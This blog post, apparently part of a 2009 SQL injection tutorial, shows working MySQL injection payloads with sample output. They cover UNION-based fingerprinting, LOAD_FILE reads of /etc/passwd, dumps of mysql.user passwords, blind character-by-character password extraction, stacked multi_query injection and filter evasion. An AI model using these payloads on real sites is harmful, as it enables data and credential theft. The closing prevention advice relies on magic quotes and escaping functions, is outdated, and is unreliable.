---[ 0x05: Basic Victim Fingerprinting ]
In this part of the paper I'll explain some easy, but interesting, ways used while trying to do
information gathering before the Vulnerability Assessment and Penetration Test steps.
This is our scenario: we found a bugged Web Application on the host and we can inject our
SQL code.
So, what we need to know? Could be interesting to know the mysql server version;
maybe it's a bugged version and we can exploit it.
How to do that? (I will not use bugged code; I'll just make some examples. Use your
mind to understand how to use "these tips")
mysql> select * from fnews WHERE id = 1 union select version(), NULL, NULL, NULL from usr;
-----------------------------------------------------------------------------
| id | pri | title | texts |
-----------------------------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
-----------------------------------------------------------------------------
| 5.0.22-Debian | NULL | NULL | NULL |
-----------------------------------------------------------------------------
Here our mysql version. Also the OS has been putted on the screen :) (take in mind that
sometimes these information are modified).
Could be interesting to know the server time:
mysql> select * from fnews WHERE id = 1 union select NOW(), NULL, NULL, NULL from usr;
---------------------------------------------------------------------------
| id | pri | title | texts |
---------------------------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
---------------------------------------------------------------------------
| 2009-02-27 00:03:56 | NULL | NULL | NULL |
---------------------------------------------------------------------------
Yes, sometimes is useful to know what is the user used to connect to the database.
mysql> select * from fnews WHERE id = 1 union select USER(), NULL, NULL, NULL from usr;
--------------------------------------------------------------------
| id | pri | title | texts |
--------------------------------------------------------------------
| 1 | 0 | testing news 2 | could be bypassed easily? |
--------------------------------------------------------------------
| omni@localhost | NULL | NULL | NULL |
--------------------------------------------------------------------
An interesting function implemented in mysql server is LOAD_FILE that, as the
word say, is able to load a file. What we can do with this? gain information and
read files. Here below the query used as example:
select * from news where id=1 union select NULL,NULL,LOAD_FILE('/etc/passwd') from usr;
This is what my FireFox shows to me:
http://www.victim.net/CMS/view.php?id=1%20union%20select%20NULL,NULL,LOAD_FILE('/etc/password')%20from%20usr;
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
WELCOME TO www.victim.net NEWS
Title:testing news
News:
what about SQL Injection?
Title:
News:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
[output cutted]
[...]
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
Sounds interesting right, don't you?
Could be interesting to get some sensitive information such as mysql users and passwords
right? By injecting our code as shown below we can get such that information.
SELECT * FROM news WHERE id='1' UNION SELECT Host, User, Password FROM mysql.user/*'
-------------------------------------------------------------------------------[/]
---[ 0x06: Standard Blind SQL Injection ]
SQL Injection and Blind SQL Injection are attacks that are able to exploit a software
vulnerability by injecting sql codes; but the main difference between these attacks
is the method of determination of the vulnerability.
Yes, because in the Blind SQL Injection attacks, attacker will look the results
of his/her requests (with different parameter values) and if these results will return
the same information he/she could obtain some interesting data. (I know, it seems
a bit strange; but between few lines you will understand better).
But why Standard Blind SQL Injection? What does it mean? In this part of the paper
I'll explain the basic way to obtain information with Blind SQL Injection without bear
in mind that this type of attacks could be optimized. I don't wanna talk about the
methods to optimize a Blind SQL Injection attack.(Wisec found interesting things about that -
"Optimizing the number of requests in blind SQL injection").
Ok, let's make a step forward and begin talking about Detection of Blind SQL Injection.
To test this vulnerability we have to find a condition that is always true; for example
1=1 is always TRUE right? Yes, but when we have to inject our code in the WHERE
condition we don't know if our new injected query will be true or false; therefore
we have to make some tests. When the query is true? The query is true when the record
returned contain the correct information. Maybe is a little bit strange this explanation but
to make things clear I wanna let you see an example. Suppose that we requested this
URL:
http://www.victim.net/CMS/view.php?id=1
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
WELCOME TO www.victim.net NEWS
Title:testing news
News:
what about SQL Injection?
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
As you can see we have just viewed our first news (id=1). What happends if we request
this other URL: http://www.victim.net/CMS/view.php?id=1 AND 1=1 ?
In our browser we just see the same page because the query is obviously true.
Here below the injected query:
SELECT * FROM news WHERE id=1 AND 1=1 LIMIT 1
Now, we (I hope) have understood what is a Blind SQL Injection; and to understand
better how we can use this, I want to make a simple example/scenario. I'm thinking that
the web application is connected to MySQL using the user omni; how to know this by using
Blind SQL Injection? Just requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND USER()=omni@localhost'
and watch the reply sent on our browser. If in our FireFox (or whatever you want)
we will see the news with ID=1 we know that omni is the user used to connect to
the mysql deamon (because the query is true; and we found the true value to pass
to the query).
Let's go deeper. What we can do with Blind SQL? Could be interesting to retrieve
the admin password. How to do that? First of all to understand better the
steps I'm going to explain we need to know some basic information.
Function used in MySQL:
- ASCII(str)
Returns the numeric value of the leftmost character of the string str.
Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII()
works for 8-bit characters.
mysql> select ascii('a');
-----------
| ascii('A') |
-----------
| 97 |
-----------
mysql> select ascii('b');
-----------
| ascii('b') |
-----------
| 98 |
-----------
- ORD(str)
If the leftmost character of the string str is a multi-byte character, returns
the code for that character, calculated from the numeric values of its constituent
bytes using this formula:
(1st byte code)
+ (2nd byte code x 256)
+ (3rd byte code x 2562) ...
If the leftmost character is not a multi-byte character, ORD() returns the same value as
the ASCII() function.
- SUBSTRING(str,pos), SUBSTRING(str FROM pos),
SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)
The forms without a len argument return a substring from string str starting at position pos.
The forms with a len argument return a substring len characters long from string str, starting
at position pos.
The forms that use FROM are standard SQL syntax. It is also possible to use a negative value
for pos. In this case, the beginning of the substring is pos characters from the end of the
string, rather than the beginning.
A negative value may be used for pos in any of the forms of this function.
- SUBSTR(str,pos), SUBSTR(str FROM pos),
SUBSTR(str,pos,len), SUBSTR(str FROM pos FOR len)
SUBSTR() is a synonym for SUBSTRING().
mysql> select substring('Blind SQL', 1, 1);
----------------------------
| substring('Blind SQL', 1, 1) |
----------------------------
| B |
----------------------------
mysql> select substring('Blind SQL', 2, 1);
----------------------------
| substring('Blind SQL', 2, 1) |
----------------------------
| l |
----------------------------
- LOWER(str)
Returns the string str with all characters changed to lowercase according to
the current character set mapping. The default is latin1 (cp1252 West European).
mysql> SELECT LOWER('SQL');
----------------
| LOWER('SQL') |
----------------
| sql |
----------------
- UPPER(str)
Returns the string str with all characters changed to uppercase according to
the current character set mapping. The default is latin1 (cp1252 West European).
mysql> SELECT UPPER('sql');
--------------
| UPPER('sql') |
--------------
| SQL |
--------------
Now we have understood the principals MySQL functions that could be used while
trying to do a Blind SQL Injection attack. (consult MySQL reference manuals for others)
What we need again? Suppose that we know for a moment the admin password: "secret".
mysql> select ascii('s');
-----------
| ascii('s') |
-----------
| 115|
-----------
mysql> select ascii('e');
-----------
| ascii('e') |
-----------
| 101|
-----------
mysql> select ascii('c');
-----------
| ascii('c') |
-----------
| 99 |
-----------
mysql> select ascii('r');
-----------
| ascii('r') |
-----------
| 114|
-----------
mysql> select ascii('t');
-----------
| ascii('t') |
-----------
| 116|
-----------
It's time to watch the source code:
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
[ ... ]
$SQL = "select * from news where id=".$_GET['id']." LIMIT 1";
$result = mysql_query($SQL);
if (!$result) {
die('Invalid query: ' . mysql_error());
}
[ ... ]
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
Now, try to "exploit the bug" by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
WELCOME TO www.victim.net NEWS
Title:testing news
News:
what about SQL Injection?
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
The query is TRUE (we know that the first letter of the password is 's') and therefore, the query will be:
SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) = 115 LIMIT 1
What is the number 115? Read upon is the ascii value of the 's'. We retrieved the first character
of the password (by using some MySQL functions).
.:. (SELECT pwd FROM usr WHERE id=1) => SELECT the password of the user with ID=1 (admin)
.:. (SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1) => Get the first letter of the password (in this case 's')
.:. ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),1,1)) => Get the ASCII code of the first letter (115 in this case)
And how to retrieve the second letter of the password? Just carry out this query:
SELECT * FROM news WHERE id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101 LIMIT 1
by requesting this URL:
http://www.victim.net/CMS/view.php?id=1 AND ASCII(SUBSTRING((SELECT pwd FROM usr WHERE id=1),2,1)) = 101
The third character? And the others? Just make the same query with the right values.
Take in mind that you can also use the "greater then" (>) and "less then" (<) symbols instead of the equal; to find the ASCII letter between a range of letters. Eg.: between 100 and 116; and so on. -------------------------------------------------------------------------------[/] ---[ 0x07: Double Query ] Sometimes in some codes happends that a programmer use the MySQLi Class (MySQL Improved Extension) that is an extension allows you to access to the functionality provided by MySQL 4.1 and above. I'll explain a very interesting bug that could be very dangerous for the system. A not properly sanitized variable passed in the method called multi_query of the mysqli class can be used to perform a "double" sql query injection. mysqli_multi_query (PHP 5) is able to performs one or more queries on the database selected. The queries executed are concatenated by a semicolon. Look this example to know what I'm talking about: -/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/ multi_query($query)) {
do {
/* the first result set */
if ($result = $mysqli->store_result()) {
while ($row = $result->fetch_row()) {
echo " - " .$row[0]. "
" ;
}
$result->free();
}
/* print divider */
if ($mysqli->more_results()) {
echo "/-/-/-/-/-/-/-/-/-/-/-/-/-/
";
}
} while ($mysqli->next_result());
}
/* close connection */
$mysqli->close();
?>
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
If a user request the follow URL:
http://www.victim.net/CMS/multiple.php?id=2
The browser reply with this information:
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
UserName: - ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- could be bypassed easily?
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
But the source code is bugged. The $query variable is vulnerable because
a user can supply using the GET method, an evil id and can do multiple (evil) queries.
Trying with this request:
http://localhost/apache2-default/multiple1.php?id=2; SELECT pwd FROM usr/*
We will obtain the users passwords.
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
UserName: - ad
/-/-/-/-/-/-/-/-/-/-/-/-/-/
- secret
- adpwd
- test
-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/
-------------------------------------------------------------------------------[/]
---[ 0x08: Filters Evasion ]
Web Application could implements some input filters that prevent an attacker from
exploiting certain flaws such as SQL Injection, LFI or whatever. Therefore an application
can use some mechanism that are able to sanitize, block or parse in some ways
user-supply data. This kind of filters could be bypassed by using differents methods,
here I wanna try to give to you some ideas; but certainly one filter differ from
an other one so, you have to try/find different methods to bypass it.
- Imagine that we have to bypass a login form; but the comment symbol is blocked,
we can bypass this issue but injecting this data ' OR 'a' = 'a instead of ' OR 1 = 1 /*
- The filter try to prevent an SQL Injection by using this kind of Signature: ' or 1=1 (Case-insensitive).
An attacker can bypass this filter using ' OR 'foobar' = 'foobar for example.
- Suppose that the application filter the keyword "admin", to bypass this filter we have just
to use some MySQL functions such as CONCAT or CHAR for example:
union select * from usr where user = concat('adm','in')/*
union select * from usr where user=char(97,100,109,105,110)/*
This is only a little part of "filter evasion techniques". Different filters work
differently, I can't stay on this topic forever; I just gave to you some ideas.
-------------------------------------------------------------------------------[/]
---[ 0x09: SQL Injection Prevention ]
How to prevent this type of attacks? Here below I just wanna write some
tips that you can use to make your web application more secure.
1.) The file php.ini located on our HD (/etc/php5/apache2/php.ini, /etc/apache2/php.ini,
and so on..) can help us with the magic quote functions. Other interesting functions can
be setted to On; take a look inside this file.
Magic quotes can be used to escape automatically with backslash the user-supply single-quote ('),
double-quote ("), backslash (\) and NULL characters.
The 3 magic quotes directives are:
- magic_quotes_gpc, that affects HTTP request data such as GET, POST and COOKIE.
- magic_quotes_runtime, if enabled, most functions that return data from an external source, will have
quotes escaped with a backslash.
- magic_quotes_sybase, that escape the ' with '' instead of \'.
2.) deploy mod_security for example
3.) use functions such as addslashes() htmlspecialchars(), mysql_escape_string(), etc. to validate
every user inputs.
4.) For integer input validate it by casting the variable
-------------------------------------------------------------------------------[/]
---[ 0x10: Conclusion ]
Here we are, at the end of this paper. As said upon, I hope you enjoyed it and
lets hack
-------------------------------------------------------------------------------[/]
Saturday, May 16, 2009
MySQL: Secure Web Apps - SQL Injection techniques Part 2
Subscribe to:
Post Comments (Atom)
Posts
No comments:
Post a Comment